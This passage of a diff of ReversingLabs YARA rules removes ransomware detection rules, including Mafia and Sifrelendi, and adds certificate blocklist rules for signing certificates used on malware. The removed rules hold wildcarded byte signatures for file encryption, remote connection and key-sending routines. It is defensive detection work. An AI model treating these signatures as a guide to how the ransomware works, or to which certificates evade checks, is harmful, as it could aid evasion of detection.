?? ?? ?? 7D ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 6F - ?? ?? ?? ?? 13 ?? 02 11 ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 02 7B ?? ?? ?? ?? 02 7B - ?? ?? ?? ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 28 ?? ?? ?? ?? 20 ?? ?? ?? ?? 8D ?? ?? - ?? ?? 13 ?? 11 ?? 16 - } - $encrypt_files_2 = { - 72 ?? ?? ?? ?? A2 11 ?? 17 72 ?? ?? ?? ?? A2 11 ?? 18 72 ?? ?? ?? ?? A2 11 ?? - 19 72 ?? ?? ?? ?? A2 11 ?? 1A 72 ?? ?? ?? ?? A2 11 ?? 1B 72 ?? ?? ?? ?? A2 11 - ?? 1C 72 ?? ?? ?? ?? A2 11 ?? 1D 72 ?? ?? ?? ?? A2 11 ?? 1E 72 ?? ?? ?? ?? A2 - 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? - ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? - 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? - ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? - 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 - 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? - ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? - 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? - ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? - 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 - 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? - ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? - 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? - ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? - 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 - 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? - ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? - 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? - ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? - 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 - 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? - ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 - } - $lockfile = { - 02 7B ?? ?? ?? ?? 16 FE ?? 3A ?? ?? ?? ?? 21 EA 17 ?? ?? ?? ?? ?? ?? ?? - 03 73 ?? ?? ?? ?? [2-4] 6F ?? ?? ?? ?? [2-4] 21 00 65 CD 1D - 00 00 00 00 FE ?? 16 FE ?? 2D ?? [2-4] FE ?? 16 FE ?? 2D ?? 03 28 - ?? ?? ?? ?? ?? 28 ?? ?? ?? ?? 04 6F ?? ?? ?? ?? [1-2] 28 ?? ?? ?? ?? [1-2] - 6F ?? ?? ?? ?? [1-2] 02 ?? [1-2] 28 ?? ?? ?? ?? [1-2] 03 [1-2] 28 ?? ?? - ?? ?? 03 03 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? [1-2] ?? FE ?? - 16 FE ?? 2D ?? 2B ?? 03 03 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? - 2B ?? 03 28 ?? ?? ?? ?? ?? 28 ?? ?? ?? ?? 04 6F ?? ?? ?? ?? [1-2] 28 ?? - ?? ?? ?? [1-2] 6F ?? ?? ?? ?? [1-2] 02 ?? [1-2] 28 ?? ?? ?? ?? [1-2] 03 - [1-2] 28 ?? ?? ?? ?? 03 03 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? - 2A - } - $lockdir = { - 03 28 ?? ?? ?? ?? 0A 03 28 ?? ?? ?? ?? 0B 16 0C 08 06 8E 69 FE ?? 2C ?? - 00 06 08 9A 28 ?? ?? ?? ?? 0D 05 09 28 ?? ?? ?? ?? 16 FE ?? 2D ?? 02 25 - 7B ?? ?? ?? ?? 17 58 7D ?? ?? ?? ?? 02 06 08 9A 04 28 ?? ?? ?? ?? DE ?? - 26 DE ?? 26 DE ?? 08 17 58 0C 2B ?? 16 0C 08 07 8E 69 FE ?? 2C ?? 00 02 - 07 08 9A 04 05 28 ?? ?? ?? ?? 02 07 08 9A 04 28 ?? ?? ?? ?? DE ?? 26 DE - ?? 26 DE ?? 08 17 58 0C 2B ?? 2A - } - $sendkey = { - 00 02 7C ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 73 ?? ?? ?? ?? 0B 73 ?? ?? ?? ?? - 0C 08 72 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 08 72 ?? ?? ?? ?? - 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 08 72 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F - ?? ?? ?? ?? 08 72 ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 07 03 72 ?? ?? ?? ?? 08 - 6F ?? ?? ?? ?? 26 07 6F ?? ?? ?? ?? DE ?? 26 DE ?? 2A - } - condition: - uint16(0)==0x5A4D and (( all of ($encrypt_files_*)) and $lockfile and $lockdir and $sendkey) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Xin Zhou" and pe.signatures[i].serial=="60:49:70:70:ff:4a:83:bc:87:bd:ea:24:da:5b:43:1d" and 1477008000<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Mafia : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_0A333E : INFO FILE { meta: - description = "Yara rule that detects Mafia ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "67f09000-751f-539a-b222-25b1502c2728" - date = "2020-07-15" - modified = "2020-07-15" + id = "5eaac242-ca22-5c73-9027-308d351080bf" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Mafia.yara#L1-L142" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "5c17b799f0b4f1f8f72a2e4203a6606f7783ceec2034694f8a21ff65e5afdb26" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L15188-L15204" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "f76d21e0ae2cf9b28825c813fc509d533c10aba38f8f0c2884365047c1272c1f" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Mafia" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $find_files = { - 55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? - ?? ?? 53 56 57 68 ?? ?? ?? ?? 8D 44 24 ?? 8B F1 6A ?? 50 89 74 24 ?? C7 44 24 ?? ?? - ?? ?? ?? E8 ?? ?? ?? ?? 33 C9 68 ?? ?? ?? ?? 51 8D 94 24 ?? ?? ?? ?? 52 66 89 8C 24 - ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 68 ?? ?? ?? ?? 50 8D 8C 24 ?? ?? ?? ?? 51 66 89 84 - 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? - ?? 83 C4 ?? 8D 44 24 ?? 50 8D 8C 24 ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? - 0F 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? - ?? ?? ?? 8B 35 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 68 ?? ?? ?? ?? 8D - 8C 24 ?? ?? ?? ?? 6A ?? 51 E8 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 52 8D 84 24 ?? ?? ?? - ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8C 24 ?? ?? ?? ?? 51 FF D6 B8 ?? ?? - ?? ?? 5F 5E 5B 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 8B E5 5D C3 56 81 EC ?? ?? - ?? ?? B9 ?? ?? ?? ?? 8D B4 24 ?? ?? ?? ?? 8B FC F3 A5 E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? - ?? 8D 54 24 ?? 52 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 44 24 ?? 50 81 EC ?? ?? ?? ?? - B9 ?? ?? ?? ?? 8D B4 24 ?? ?? ?? ?? 8B FC F3 A5 E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 8D - 4C 24 ?? 51 53 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 53 FF 15 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? - ?? 5F 5E 5B 33 CC 33 C0 E8 ?? ?? ?? ?? 8B E5 5D C3 - } - $remote_connection_p1 = { - 55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 33 C0 57 - 68 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 66 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85 - ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 6A ?? 52 C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? - ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? - ?? 8D 8D ?? ?? ?? ?? 6A ?? 51 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 - ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 85 C0 75 ?? - 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 - 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 68 ?? - ?? ?? ?? 52 E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 83 C4 ?? 33 C0 68 ?? - ?? ?? ?? 50 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? - 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 51 E8 ?? - ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F0 33 C0 89 85 - } - $remote_connection_p2 = { - 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? - ?? 66 89 95 ?? ?? ?? ?? 8B 48 ?? 8B 11 8B 02 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8D - 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? FF - 15 ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? - 83 F8 ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 50 ?? 8B FF 8A 08 40 84 C9 75 ?? 6A - ?? 2B C2 50 8D 8D ?? ?? ?? ?? 51 56 FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 95 ?? - ?? ?? ?? 52 56 FF D3 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 - C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D7 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 50 - 8D 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 FF - D7 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 51 E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8D - 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 FF D7 - 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 6A ?? 52 E8 ?? ?? ?? ?? 53 8D 85 ?? ?? ?? ?? 68 ?? - ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 FF D7 68 ?? ?? ?? ?? 8D 95 - ?? ?? ?? ?? 6A ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF - 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 40 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? EB - ?? 68 ?? ?? ?? ?? FF D7 56 FF 15 ?? ?? ?? ?? 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? - 8B E5 5D C3 68 - } - $encrypt_files_p1 = { - 55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? - ?? ?? 53 56 8B 75 ?? 57 68 ?? ?? ?? ?? 33 DB 8D 8C 24 ?? ?? ?? ?? 33 C0 53 51 66 89 - 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 54 24 ?? 53 52 89 5C 24 - ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 44 24 ?? 53 50 89 5C 24 ?? E8 ?? ?? ?? ?? 83 C4 - ?? 33 C0 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 53 51 89 5C 24 ?? 89 44 24 ?? 89 44 24 - ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 88 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? - 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 53 52 88 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 - ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 53 50 88 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 - C4 ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 33 C9 53 52 66 89 8C 24 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 8B 4D ?? 8B C1 83 C4 ?? 48 74 ?? 48 74 ?? 8B 45 ?? 8B 55 ?? 50 52 51 56 FF - 15 ?? ?? ?? ?? 5F 5E 5B 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 8B E5 5D C2 - } - $encrypt_files_p2 = { - 53 FF 15 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 5F 5E 5B 33 CC 33 C0 E8 ?? ?? ?? ?? 8B E5 - 5D C2 ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? - FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 - ?? ?? ?? ?? 83 C4 ?? 33 F6 E8 ?? ?? ?? ?? 25 ?? ?? ?? ?? 79 ?? 48 0D ?? ?? ?? ?? 40 - 88 86 ?? ?? ?? ?? 46 83 FE ?? 7C ?? 33 F6 E8 ?? ?? ?? ?? 25 ?? ?? ?? ?? 79 ?? 48 0D - ?? ?? ?? ?? 40 88 86 ?? ?? ?? ?? 46 83 FE ?? 7C ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? - ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 8D 49 ?? 0F B6 83 ?? ?? ?? ?? 6A - ?? 8D 94 24 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8C 24 ?? ?? ?? ?? 51 8D 94 - 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 83 C4 ?? 8B C8 - 8A 10 40 84 D2 75 ?? 8D BC 24 ?? ?? ?? ?? 2B C1 8B F1 4F 8A 4F ?? 47 84 C9 75 ?? 8B - C8 C1 E9 ?? F3 A5 8B C8 83 E1 ?? 8D 84 24 ?? ?? ?? ?? F3 A4 8B C8 8A 10 40 84 D2 75 - ?? BF ?? ?? ?? ?? 2B C1 8B F1 4F 8A 4F ?? 47 84 C9 75 ?? 8B C8 C1 E9 ?? F3 A5 8B C8 - } - $encrypt_files_p3 = { - 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 83 E1 ?? 6A ?? 50 F3 A4 E8 ?? ?? ?? ?? 83 C4 ?? - 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 6A ?? 51 E8 ?? ?? ?? ?? 43 83 C4 ?? 83 FB ?? 0F - 8C ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? - ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? - ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 33 DB EB ?? 8D A4 24 ?? ?? ?? ?? EB ?? 8D 49 ?? - 0F B6 83 ?? ?? ?? ?? 6A ?? 8D 94 24 ?? ?? ?? ?? 52 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8C - 24 ?? ?? ?? ?? 51 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8D 84 24 ?? - ?? ?? ?? 83 C4 ?? 8B C8 8A 10 40 84 D2 75 ?? 8D BC 24 ?? ?? ?? ?? 2B C1 8B F1 4F 8A - 4F ?? 47 84 C9 75 ?? 8B C8 C1 E9 ?? F3 A5 8B C8 83 E1 ?? 8D 84 24 ?? ?? ?? ?? F3 A4 - 8B C8 8A 10 40 84 D2 75 ?? BF ?? ?? ?? ?? 2B C1 8B F1 4F 8A 4F ?? 47 84 C9 75 ?? 8B - } - $encrypt_files_p4 = { - C8 C1 E9 ?? F3 A5 8B C8 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 83 E1 ?? 6A ?? 50 F3 A4 - E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 6A ?? 51 E8 ?? ?? ?? ?? - 43 83 C4 ?? 83 FB ?? 0F 8C ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 68 - ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ?? ?? ?? E8 - ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? BF ?? ?? ?? ?? 8D B4 24 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? - 56 FF D3 83 C4 ?? 56 FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 6A ?? 6A ?? 56 68 ?? ?? ?? ?? - 6A ?? 6A ?? E8 ?? ?? ?? ?? 8B 4C 24 ?? 83 C4 ?? 89 44 8C ?? 41 89 4C 24 ?? 47 83 C6 - ?? 83 FF ?? 7E ?? 8B 54 24 ?? 6A ?? 6A ?? 8D 4C 24 ?? 51 52 FF 15 ?? ?? ?? ?? 8D 44 - 24 ?? 50 8D 4C 24 ?? 51 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF - 15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E8 - ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? FF 15 - } - condition: - uint16(0)==0x5A4D and ($find_files) and ( all of ($encrypt_files_p*)) and ( all of ($remote_connection_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Coulomb Limited" and pe.signatures[i].serial=="0a:33:3e" and 1052750648<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Sifrelendi : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_1Cb6519B2528D006D1Da987153Dad2B3 : INFO FILE { meta: - description = "Yara rule that detects Sifrelendi ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "b9083b7c-eb09-52da-a240-39b51df892f9" - date = "2020-07-15" - modified = "2020-07-15" + id = "774e28f7-46ba-533d-a73c-00d2536c7d2b" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Sifrelendi.yara#L1-L67" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "430d3877c10c86fcb19b5624dd8886d61e54ccd0453678329309b49712c6d5c6" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L15206-L15222" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "776402fc3a7de4843373bc1981f965fe9c2a9f1fe2374b142a96952fd05a591b" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Sifrelendi" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $search_files = { - E9 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 - ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? - 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 7E ?? 8D 85 ?? ?? ?? - ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? E8 - ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 33 C0 5A 59 59 64 89 10 68 - ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? - ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? - ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 - 89 20 F6 85 ?? ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 - ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? 8D 85 ?? ?? ?? ?? 8B 8D ?? - ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? E8 ?? ?? ?? ?? - 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? - 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 33 C0 5A 59 59 64 89 10 EB - ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? - ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? - ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 5F 5E 5B 8B E5 5D - C3 - } - $encrypt_files = { - 55 8B EC 83 C4 ?? 53 56 57 33 DB 89 5D ?? 89 4D ?? 89 55 ?? 89 45 ?? 8B 45 ?? E8 ?? - ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 - FF 30 64 89 20 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B2 ?? A1 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 89 45 ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 33 C9 B2 ?? A1 ?? ?? - ?? ?? E8 ?? ?? ?? ?? 8B F8 8B 0D ?? ?? ?? ?? 8B 55 ?? 8B C7 E8 ?? ?? ?? ?? 33 C9 B2 - ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 8B 0D ?? ?? ?? ?? 8B 55 ?? 8B C6 E8 ?? ?? ?? - ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 8B 45 - ?? 8B 10 FF 12 50 8B CB 8B 55 ?? 8B C6 E8 ?? ?? ?? ?? 8B C6 8B 10 FF 52 ?? 6A ?? 6A - ?? 8B 